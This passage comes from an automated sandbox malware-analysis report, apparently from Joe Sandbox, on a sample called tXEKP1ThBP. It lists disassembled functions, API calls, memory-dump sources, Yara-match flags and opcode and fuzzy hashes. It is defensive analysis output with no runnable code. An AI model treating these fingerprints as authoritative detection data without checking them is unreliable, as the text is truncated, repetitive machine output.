                                                      • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                      • Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
                                                      • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                      • Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44
                                                      Function 1000E184 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                      • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                      • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                      • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                      Function 04B23F4D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B23F48,?,?,00000008,?,?,04B2AB25,00000000), ref: 04B2417A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise
                                                      • String ID:
                                                      • API String ID: 3997070919-0
                                                      • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                      • Instruction ID: d9fb8fcd7545c9f7ad1c50ef5d4134e12c0b9493fdf9f0986bb165f4c41165e6
                                                      • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                      • Instruction Fuzzy Hash: 12B16C31610614DFDB18CF28C586BA57BE0FF45365F258698E89ECF6A2C335E992CB40
                                                      Function 00415D07 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                      • Instruction ID: 5ef8e782818ac5c356667e56c32e051b370d413b7f744af6f0ed5b3d29dfc074
                                                      • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                      • Instruction Fuzzy Hash: 5141B6B1C04618AFDB24DF69CC89AEABBB8EF85304F1442DEE41DD3211DA359E858F14
                                                      Function 10007EA9 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2244449840.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.2244427954.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244510280.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000004.00000002.2244531740.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                      • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                                      • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                      • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                                      Function 04B25F6E Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                      • Instruction ID: 15ec838b8bba35dc1030e37fd44e9a6fdf575ec3a0298097bf161702a53ff127
                                                      • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                      • Instruction Fuzzy Hash: 7941A6B5804228AFDF20DF79CD88AEABBB8EF45304F5442D9E45DD3210DA35AE858F50
                                                      Function 0081C9D7 Relevance: 1.5, Strings: 1, Instructions: 298COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NTDL
                                                      • API String ID: 0-3662016964
                                                      • Opcode ID: 13fa67aed725e81e9413279ada567bd8691dc9fa79b1fb4a72c20680d850b8c1
                                                      • Instruction ID: 24cb02f232fcbc414a6d4b49dee05553bc0b4311c93a65c3e95fcf6dfa9c9928
                                                      • Opcode Fuzzy Hash: 13fa67aed725e81e9413279ada567bd8691dc9fa79b1fb4a72c20680d850b8c1
                                                      • Instruction Fuzzy Hash: 71A1D1B298831E8FCB11CF25D4415EF7BE9FF56324B24812AD846C7A02D2724DA1DF99
                                                      Function 00409949 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                      • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                      • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                      • Instruction Fuzzy Hash:
                                                      Function 04B19BB0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00409955,04B197B6), ref: 04B19BB5
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                      • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                      • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                      • Instruction Fuzzy Hash:
                                                      Function 008B2B3E Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x??w
                                                      • API String ID: 0-910637921
                                                      • Opcode ID: d01965c836ecedf9dd004366d80e4ffd3fc66dc95d98c12c46398077e8553edf
                                                      • Instruction ID: 88876af0ebcc32ae5083fad1b05b850f2fe4cd2a2c47d73bf50f4a8059410562
                                                      • Opcode Fuzzy Hash: d01965c836ecedf9dd004366d80e4ffd3fc66dc95d98c12c46398077e8553edf
                                                      • Instruction Fuzzy Hash: D87189F3E082185BE3187928DC4977AB7D5EB90320F1B463DDF8993780E97D59058686
                                                      Function 0096E83A Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Fn
                                                      • API String ID: 0-3347897105
                                                      • Opcode ID: 7923ffcfe7fa0be304e85014c9fa3ebfd3f23c656520b393ae1405d9ff08c720
                                                      • Instruction ID: 48c15b8dc24c65c229dffee7c5367f2649df0badc6b17ffdb5affc43d041763d
                                                      • Opcode Fuzzy Hash: 7923ffcfe7fa0be304e85014c9fa3ebfd3f23c656520b393ae1405d9ff08c720
                                                      • Instruction Fuzzy Hash: 5C615DF3F186045FF3086A6CDC95B76B7D9EB94320F2A463DEA85C7380E97958018296
                                                      Function 009148E9 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 3(U
                                                      • API String ID: 0-3370724776
                                                      • Opcode ID: b12b25eb10893ee5171d8106a24f000f01037aefe4fccecec502f96ab2e26019
                                                      • Instruction ID: ad1d181eb63c7e681d98ce5dbec40b9d638b36f495af675681d69eead0988434
                                                      • Opcode Fuzzy Hash: b12b25eb10893ee5171d8106a24f000f01037aefe4fccecec502f96ab2e26019
                                                      • Instruction Fuzzy Hash: D471F4F35183149FE748AE2DDC8676ABBD8EF54720F1A493DEAC5C3340E97998008786
                                                      Function 0040D3DD Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                      • Instruction ID: c0798f424e7f96b2d13f24c6de611a6824aa2a21751a5330029b757c988de18e
                                                      • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                      • Instruction Fuzzy Hash: 8A513870E04644AADB389AED88957BF67999F01308F54043FD882F73C1D67DAD4E861E
                                                      Function 0040D60F Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                      • Instruction ID: 624e85d5d4f9056646b760ddf11ce83fdf6d5af507a6eedaef23f3504edbf722
                                                      • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                      • Instruction Fuzzy Hash: B5512370E0474896DB389AE88895BBF67995B12308F14483FD84AF73C1C67E9D4EC61E
                                                      Function 04CCC7DD Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                      • Instruction ID: 6d4def717ec2397735ab8b83eaa5e18b6523c0983909c882524040f76074b285
                                                      • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                      • Instruction Fuzzy Hash: B15159707006486AFB388E6D84A97BF679B9F02304F0C042ED48FD7681EA15FB86D356
                                                      Function 04CCCA0F Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                      • Instruction ID: 8fac8f83fc292382bfb04e6b933352badfb3c8f5475290aeb572f2f009961eb1
                                                      • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                      • Instruction Fuzzy Hash: E4515970740B48AAEB38CAAC84ED7BE679B9B02708F08447ED54FD7680D611FB45D356
                                                      Function 04B1D644 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                      • Instruction ID: 102ff7dd84ee1ec423aaa5c13eff59da82e4d128d73e50e519c39f6eea1df4d9
                                                      • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                      • Instruction Fuzzy Hash: 63516970700A48AAEF3C9A2C88947BF779EDB42304FD409DED48ADB2B1E615F944C752
                                                      Function 04B1D876 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2242455877.0000000004B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_4b10000_tXEKP1ThBP.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                      • Instruction ID: 8df9aaf0a50b2bcb3d8950b803ffdfdcb6661d27dd58727cd2d352d700b65e31
                                                      • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                      • Instruction Fuzzy Hash: 08518C30604A48A6EB388A6C8894BFE679DDB92388FC405DED482DB2F0D615FA46C351
                                                      Function 0086E07A Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Q}}
                                                      • API String ID: 0-2232933931
                                                      • Opcode ID: 8b1d1fa667ae9d9c47dfc506ca6e729087d62614c5242498c74d0f0081b35c6a
                                                      • Instruction ID: 6de342238bc87c5f57ed0d9103b043f413a55ed55a2241351d9a15e231cda191
                                                      • Opcode Fuzzy Hash: 8b1d1fa667ae9d9c47dfc506ca6e729087d62614c5242498c74d0f0081b35c6a
                                                      • Instruction Fuzzy Hash: D05117F3A182009FF3049A2DEC5576AB7DAEBD4720F2A892DF5C4D3784E93898018756
                                                      Function 00939167 Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ty
                                                      • API String ID: 0-4074520636
                                                      • Opcode ID: 5d2709ac69d55b81170c9079c402d2557a63e9b40a3d85f1599a27d136d3bea5
                                                      • Instruction ID: 49bd955b480144e5835e7ad4abdcc5ab3e63f6aec246e1360a84e617f70cdd18
                                                      • Opcode Fuzzy Hash: 5d2709ac69d55b81170c9079c402d2557a63e9b40a3d85f1599a27d136d3bea5
                                                      • Instruction Fuzzy Hash: D251C1F39086149BE310BE28EC8576AB7E5EF64320F0A493DDAD4C7380E67998548696
                                                      Function 0094EA5A Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: N,
                                                      • API String ID: 0-2361122840
                                                      • Opcode ID: 039f2fb4feb9f9f820d2a9dfa604305694a3b3ebed8b8493978299a02c2de517
                                                      • Instruction ID: a8fa4554fb475d23081f4f4645a7a09350a21b65624746ba9665595cf259b213
                                                      • Opcode Fuzzy Hash: 039f2fb4feb9f9f820d2a9dfa604305694a3b3ebed8b8493978299a02c2de517
                                                      • Instruction Fuzzy Hash: 194114F39087245BE3006E18EC8137AFBE5DB90320F1A463DEED497384E939A80587C6
                                                      Function 004143F9 Relevance: .6, Instructions: 637COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239610616.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000004.00000002.2239610616.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_400000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                      • Instruction ID: 77e6785c828baecb52582d09b1b14edac196714ae9321c17d64660e5f0acdfa7
                                                      • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                      • Instruction Fuzzy Hash: DB320531E69F414DD7239634D822336A288AFB73D5F55D737E826B5EA6EB28C4C34108
                                                      Function 04CD37F9 Relevance: .6, Instructions: 637COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                      • Instruction ID: de60471c8845d5f423e4006fa838e9275654120ac4837c2f076c59cc1099b6d3
                                                      • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                      • Instruction Fuzzy Hash: C0323232E29F414DD7239A34C822336A299AFB73C5F54D737F81AB5DA6EB28D1834105
                                                      Function 00869DAC Relevance: .3, Instructions: 339COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ffd5553f046ec03dbbff0e41bdecb57ec5c853983dce5a59598d3a99194ccdf6
                                                      • Instruction ID: b29c1cd88f96bcae6ebcad52b93bb90328ce242d489e709bb76bf9950a23adce
                                                      • Opcode Fuzzy Hash: ffd5553f046ec03dbbff0e41bdecb57ec5c853983dce5a59598d3a99194ccdf6
                                                      • Instruction Fuzzy Hash: 02C167B7F116214BF3544928DDA83626583DBD9324F2F82788F586B7C9EC7E9C0A5384
                                                      Function 04CD30E6 Relevance: .3, Instructions: 274COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000003.1463319406.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_3_4cc0000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                      • Instruction ID: 4dc3409f080c034e37dd9506d2a576377132f7e638f24f56457ab999c44eca86
                                                      • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                      • Instruction Fuzzy Hash: C4B18D35610649CFD714CF18C486B657BA1FF05364F198658ED9ACF2B1C735EA82CB41
                                                      Function 008639CE Relevance: .2, Instructions: 249COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8e8f7c999145054f6d97f5540b64e0ed6dee6b60ac5430b10e9915ad6d990f2
                                                      • Instruction ID: 490a5e79dc67ebfd7cde2946797f1b4e5bba9df2e02fd88436874558ae295ad3
                                                      • Opcode Fuzzy Hash: e8e8f7c999145054f6d97f5540b64e0ed6dee6b60ac5430b10e9915ad6d990f2
                                                      • Instruction Fuzzy Hash: FC81ADF3F1252147F3504829CD583A265839BE5324F3F82388A6CAB7C5ECBE9D4A5384
                                                      Function 00829666 Relevance: .2, Instructions: 188COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0109fbc2285e77e00ab18a1aac08af139e37ca078994d2976540e598778b6925
                                                      • Instruction ID: 49504a00ce841d3c7ecafd6d575cd587718ed2b46d1b83f214311bdd09dfa4bc
                                                      • Opcode Fuzzy Hash: 0109fbc2285e77e00ab18a1aac08af139e37ca078994d2976540e598778b6925
                                                      • Instruction Fuzzy Hash: 075156B3A086144BF304AA2DDD4477BBBDADBC4720F27853DE6D8C3744E939980582C2
                                                      Function 0083986A Relevance: .2, Instructions: 181COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bebf3eb82f3a1d36947a47ac6cec54fcb7fb1880e5f777af00d13c35fa443796
                                                      • Instruction ID: 680a9909b6767476f64a1718c81594b89cef39a4412f181f952cd2428fbab36e
                                                      • Opcode Fuzzy Hash: bebf3eb82f3a1d36947a47ac6cec54fcb7fb1880e5f777af00d13c35fa443796
                                                      • Instruction Fuzzy Hash: 275156F3A082105FE7086E1DEC9573EB7D5EB88720F5A853DEBC993744E9781C018696
                                                      Function 008FCF3E Relevance: .2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_819000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd22d71c4d60e7c186c6b2c320abdc317699447ac97bd570316f8e7357bb9c34
                                                      • Instruction ID: 5e6a253c3623c50ecc968f62a2932624e26bbcc68c0f2e5fc96abc87bcc35e3c
                                                      • Opcode Fuzzy Hash: bd22d71c4d60e7c186c6b2c320abdc317699447ac97bd570316f8e7357bb9c34
                                                      • Instruction Fuzzy Hash: 3441E3F3A196145BF308AA29DC557BBB6DBDBC0320F2AC13DD28547788EE3568058296
                                                      Function 00A9624D Relevance: .2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2239849649.0000000000A90000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_a90000_tXEKP1ThBP.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
